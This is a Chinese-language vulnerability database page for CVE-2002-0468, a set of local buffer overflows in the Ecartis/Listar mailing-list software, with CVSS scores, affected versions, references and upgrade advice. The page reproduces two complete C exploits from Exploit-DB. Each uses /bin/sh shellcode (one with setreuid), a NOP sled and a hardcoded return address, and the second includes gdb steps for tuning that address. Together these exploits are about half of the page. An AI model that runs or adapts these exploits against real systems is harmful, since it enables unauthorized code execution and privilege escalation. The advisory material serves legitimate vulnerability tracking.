CVE-2002-0468
CVSS4.6
发布时间 :2002-08-12 00:00:00
修订时间 :2016-10-17 22:20:22
NMCOES    

[原文]Buffer overflows in Ecartis (formerly Listar) 1.0.0 in snapshot 20020427 and earlier allow local users to gain privileges via (1) a long command line argument, which is not properly handled in core.c, or possibly via bad uses of sprintf() in (2) moderate.c, (3) lcgi.c, (4) fileapi.c, (5) cookie.c, (6) codes.c, or other files.


[CNNVD]Ecartis/Listar存在多个本地缓冲溢出漏洞(CNNVD-200208-081)

        
        Ecartis和Listar都是使用于Linux、BSD和其他unix操作系统下的邮件列表系统,其中Ecartis是Listar软件的新名称。
        Ecartis和Listar由于对边界检查不够充分,可导致多个本地缓冲溢出攻击。
        在一些Ecartis版本中存在多个本地缓冲溢出条件,如果成功利用这些溢出,可以导致任意代码可执行,Listar一般以非特权用户'listar'权限运行,成功利用这些漏洞可以允许攻击者以'listar'用户权限进行进一步攻击。
        

- CVSS (基础分值)

CVSS分值: 4.6 [中等(MEDIUM)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:ecartis:ecartis:1.0.0_snapshot_2002-01-25
cpe:/a:listar:listar:0.129a
cpe:/a:ecartis:ecartis:1.0.0_snapshot_2002-01-21
cpe:/a:listar:listar:0.126a
cpe:/a:listar:listar:0.127a

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0468
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2002-0468
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200208-081
(官方数据源) CNNVD

- 其它链接及资源

http://marc.info/?l=listar-support&m=101590272221720&w=2
(UNKNOWN)  MISC  http://marc.info/?l=listar-support&m=101590272221720&w=2
http://online.securityfocus.com/archive/1/269658
(VENDOR_ADVISORY)  BUGTRAQ  20020425 ecartis / listar PoC
http://online.securityfocus.com/archive/1/269879
(VENDOR_ADVISORY)  BUGTRAQ  20020427 Response to KF about Listar/Ecartis Vulnerability
http://online.securityfocus.com/archive/82/258763
(VENDOR_ADVISORY)  VULN-DEV  20020227 listar / ecaris remote or local?
http://www.ecartis.org/
(UNKNOWN)  CONFIRM  http://www.ecartis.org/
http://www.iss.net/security_center/static/8445.php
(UNKNOWN)  XF  ecartis-local-bo(8445)
http://www.securityfocus.com/archive/1/261209
(UNKNOWN)  BUGTRAQ  20020310 Ecartis/Listar multiple vulnerabilities
http://www.securityfocus.com/bid/4271
(UNKNOWN)  BID  4271

- 漏洞信息

Ecartis/Listar存在多个本地缓冲溢出漏洞
中危 边界条件错误
2002-08-12 00:00:00 2005-10-20 00:00:00
本地  
        
        Ecartis和Listar都是使用于Linux、BSD和其他unix操作系统下的邮件列表系统,其中Ecartis是Listar软件的新名称。
        Ecartis和Listar由于对边界检查不够充分,可导致多个本地缓冲溢出攻击。
        在一些Ecartis版本中存在多个本地缓冲溢出条件,如果成功利用这些溢出,可以导致任意代码可执行,Listar一般以非特权用户'listar'权限运行,成功利用这些漏洞可以允许攻击者以'listar'用户权限进行进一步攻击。
        

- 公告与补丁

        临时解决方法:
        如果您不能立刻安装补丁或者升级,CNNVD建议您采取以下措施以降低威胁:
        * 严格控制本地用户对程序的访问,确信只有可信用户能访问程序。
        厂商补丁:
        Ecartis
        -------
        目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
        
        http://www.ecartis.org/

        Listar
        ------
        目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
        
        http://www.listar.org/

- 漏洞信息 (21341)

Ecartis1.0 .0,0.129 a Listar Multiple Local Buffer Overflow Vulnerabilities (1) (EDBID:21341)
linux local
2002-02-27 Verified
0 the itch
N/A [点击下载]
source: http://www.securityfocus.com/bid/4271/info

Ecartis is the new name for the Listar software product. Listar is a mailing list management package for Linux, BSD, and other Unix like operating systems.

Multiple local buffer overflow conditions have been reported in some versions of Ecartis. If successfully exploited, this may result in the execution of arbitrary code. Listar normally runs as the non-privileged user 'listar'. Exploitation of this vulnerability may allow the malicious party to launch further attacks against the system as the user 'listar'. 

/*
 * /home/listar-0.129a/listar
 *
 * The vulnerability was found by KF / Snosoft (http://www.snosoft.com)
 * Exploit coded up by The Itch / Promisc (http://www.promisc.org)
 *
 * This exploit was developed on the Snosoft vulnerability research machines
 *
 * - The Itch
 * - itchie@promisc.org
 *
 * - Technical details concerning the exploit -
 *
 * 1) Buffer overflow occurs after writing 990 bytes into the buffer at the command line
 *    (990 to overwrite ebp, 996 to overwrite eip).
 * 2) The code string with the return address will be unaligned.
 *
 */

#include <stdio.h>
#include <stdlib.h>

#define DEFAULT_EGG_SIZE 2048
#define NOP 0x90
#define DEFAULT_BUFFER_SIZE 1000

char shellcode[] =
        "\x31\xc0\x31\xdb\xb0\x17\xcd\x80"
        "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
        "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
        "\x80\xe8\xdc\xff\xff\xff/bin/sh";

int main(int argc, char *argv[])
{
        char *buff;
        char *egg;
        char *ptr;
        long *addr_ptr;
        long addr;
        int bsize = DEFAULT_BUFFER_SIZE;
        int eggsize = DEFAULT_EGG_SIZE;
        int i;
        int get_sp = 0xbffff4e0;

        if(argc > 1) { bsize = atoi(argv[1]); }

        if(!(buff = malloc(bsize)))
        {
                printf("unable to allocate memory for %d bytes\n", bsize);
                exit(1);
        }

        if(!(egg = malloc(eggsize)))
        {
                printf("unable to allocate memory for %d bytes\n", eggsize);
                exit(1);
        }

        printf("/home/listar-0.129a/listar\n");
        printf("Vulnerability found by KF / http://www.snosoft.com\n");
        printf("Coded by The Itch / http://www.promisc.org\n\n");
        printf("Using return address: 0x%x\n", get_sp);
        printf("Using buffersize    : %d\n", bsize);

        /* alignment */
        ptr = buff + 2;

        addr_ptr = (long *) ptr;
        for(i = 0; i < bsize; i+=4) { *(addr_ptr++) = get_sp; }

        ptr = egg;
        for(i = 0; i < eggsize - strlen(shellcode) -1; i++)
        {
                *(ptr++) = NOP;
        }

        for(i = 0; i < strlen(shellcode); i++)
        {
                *(ptr++) = shellcode[i];
        }

        egg[eggsize - 1] = '\0';
        buff[bsize -1] = '\0';
        memcpy(buff, "RET=", 4);
        memcpy(egg, "EGG=", 4);
        putenv(buff);
        putenv(egg);
        system("/home/listar-0.129a/listar $RET");

        return 0;
}
		

- 漏洞信息 (21342)

Ecartis 1.0 .0,0.129 a Listar Multiple Local Buffer Overflow Vulnerabilities (2) (EDBID:21342)
linux local
2002-02-27 Verified
0 the itch
N/A [点击下载]
source: http://www.securityfocus.com/bid/4271/info
 
Ecartis is the new name for the Listar software product. Listar is a mailing list management package for Linux, BSD, and other Unix like operating systems.
 
Multiple local buffer overflow conditions have been reported in some versions of Ecartis. If successfully exploited, this may result in the execution of arbitrary code. Listar normally runs as the non-privileged user 'listar'. Exploitation of this vulnerability may allow the malicious party to launch further attacks against the system as the user 'listar'. 

/* 
 * /home/ecartis/ecartis
 *
 * The vulnerability was found by KF / Snosoft (http://www.snosoft.com)
 * Exploit coded up by The Itch / Promisc (http://www.promisc.org)
 * Shellcode created by r0z / Promisc (r0z@promisc.org)
 * 
 * This exploit was developed on the Snosoft vulnerability research machines
 *
 * - The Itch
 * - itchie@promisc.org
 *
 * - Technical details concerning the exploit -
 * 
 * 1) Buffer overflow occurs after writing 996 bytes into the buffer at the command line
 *    (996 to overwrite ebp, 1000 to overwrite eip).
 * 2) The code string with the return address will be unaligned.
 * 3) Shellcode will try to do a setreuid(508);
 *
 * I had trouble reaching my own buffer in the enviroment dynamicly, so i gdb'ed it.
 * If the exploit fails, comment the system() that runs ecarthis, uncomment the other system()
 * The run this exploit, you will be in bash then, do: gdb /home/ecartis/ecartis
 * in gdb, type: run $RET
 * The program will probably then segfault, then type: x/200x $esp and press enter a couply of times
 * until you see alot of 0x90909090. Then pick on of those address and replace it with the 
 * int get_sp = 0xbffff550. Change the system() commands below back as how they were and rerun the exploit. 
 *
 */

#include <stdio.h>
#include <stdlib.h>

#define DEFAULT_EGG_SIZE 2048
#define NOP 0x90
#define DEFAULT_BUFFER_SIZE 1000


/* setreuid(508); execve("/bin/sh", "sh", 0); (c) r0z@promisc.org */
char shellcode[] =
         "\x31\xdb"              /* xor   %ebx, %ebx     */
         "\x31\xc9"              /* xor   %ecx, %ecx     */
         "\xf7\xe3"              /* mul   %ebx           */
         "\xb0\x46"              /* mov   $0x46, %al     */
         "\x66\xbb\xfc\x01"      /* mov   $0x1fc, %bx    */
         "\x49"                  /* dec   %ecx           */
         "\xcd\x80"              /* int   $0x80          */
         "\x31\xd2"              /* xor   %edx, %edx     */
         "\x52"                  /* push  %edx           */
         "\x68\x6e\x2f\x73\x68"  /* push  $0x68732f6e    */
         "\x68\x2f\x2f\x62\x69"  /* push  $0x69622f2f    */
         "\x89\xe3"              /* mov   %esp, %ebx     */
         "\x52"                  /* push  %edx           */
         "\x53"                  /* push  %ebx           */
         "\x89\xe1"              /* mov   %esp, %ecx     */
         "\x6a\x0b"              /* pushl $0xb           */
         "\x58"                  /* pop   %eax           */
         "\xcd\x80";             /* int   $0x80          */

int main(int argc, char *argv[])
{
        char *buff;
        char *egg;
        char *ptr;
        long *addr_ptr;
        long addr;
        int bsize = DEFAULT_BUFFER_SIZE;
        int eggsize = DEFAULT_EGG_SIZE;
        int i;
	int get_sp = 0xbffff550;
	
        if(argc > 1) { bsize = atoi(argv[1]); }

        if(!(buff = malloc(bsize)))
        {
                printf("unable to allocate memory for %d bytes\n", bsize);
                exit(1);
        }

        if(!(egg = malloc(eggsize)))
        {
                printf("unable to allocate memory for %d bytes\n", eggsize);
                exit(1);
        }
	
	printf("/home/ecartis/ecartis\n");
	printf("Vulnerability found by KF / http://www.snosoft.com\n");
        printf("Coded by The Itch / http://www.promisc.org\n\n");
        printf("Using return address: 0x%x\n", get_sp);
        printf("Using buffersize    : %d\n", bsize);

	/* alignment */
        ptr = buff + 2;

        addr_ptr = (long *) ptr;
        for(i = 0; i < bsize; i+=4) { *(addr_ptr++) = get_sp; }

        ptr = egg;
        for(i = 0; i < eggsize - strlen(shellcode) -1; i++)
        {
                *(ptr++) = NOP;
        }

        for(i = 0; i < strlen(shellcode); i++)
        {
                *(ptr++) = shellcode[i];
        }

        egg[eggsize - 1] = '\0';
        memcpy(egg, "EGG=", 4);
	putenv(egg);
	buff[bsize - 1] = '\0';
	memcpy(buff, "RET=", 4);
	putenv(buff);
	system("/home/ecartis/ecartis $RET");
//	system("/bin/bash");

        return 0;
}
		

- 漏洞信息

10425
Ecartis Multiple Function Local Overflows
Local Access Required Input Manipulation
Loss of Integrity
Exploit Public

- 漏洞描述

- 时间线

2002-03-10 Unknow
2002-03-10 Unknow

- 解决方案

Products

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

Ecartis/Listar Multiple Local Buffer Overflow Vulnerabilities
Boundary Condition Error 4271
No Yes
2002-02-27 12:00:00 2009-07-11 11:56:00
Discovered by KF <dotslash@snosoft.com>. Additioanl details published by Janusz Niewiadomski (funkysh@isec.pl) and Wojciech Purczynski (cliph@isec.pl).

- 受影响的程序版本

Listar Listar 0.129 a
+ Debian Linux 2.2 sparc
+ Debian Linux 2.2 powerpc
+ Debian Linux 2.2 IA-32
+ Debian Linux 2.2 arm
+ Debian Linux 2.2 alpha
+ Debian Linux 2.2 68k
+ Debian Linux 2.2
Listar Listar 0.127 a
Listar Listar 0.126 a
Ecartis Ecartis 1.0 .0 snapshot 20020125
Ecartis Ecartis 1.0 .0 snapshot 20020121
Ecartis Ecartis 1.0 .0 snapshot 20020427

- 不受影响的程序版本

Ecartis Ecartis 1.0 .0 snapshot 20020427

- 漏洞讨论

Ecartis is the new name for the Listar software product. Listar is a mailing list management package for Linux, BSD, and other Unix like operating systems.

Multiple local buffer overflow conditions have been reported in some versions of Ecartis. If successfully exploited, this may result in the execution of arbitrary code. Listar normally runs as the non-privileged user 'listar'. Exploitation of this vulnerability may allow the malicious party to launch further attacks against the system as the user 'listar'.

- 漏洞利用

The Itch &lt;itchie@promisc.org&gt; and KF &lt;dotslash@snosoft.com&gt; have provided the following exploits:

- 解决方案

The Ecartis snapshot as of Apr 27, 2002 has been reported to fix all known issues. Users of Listar are advised to upgrade to Ecartis.


Listar Listar 0.129 a

Ecartis Ecartis 1.0 .0 snapshot 20020121

Ecartis Ecartis 1.0 .0 snapshot 20020125

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站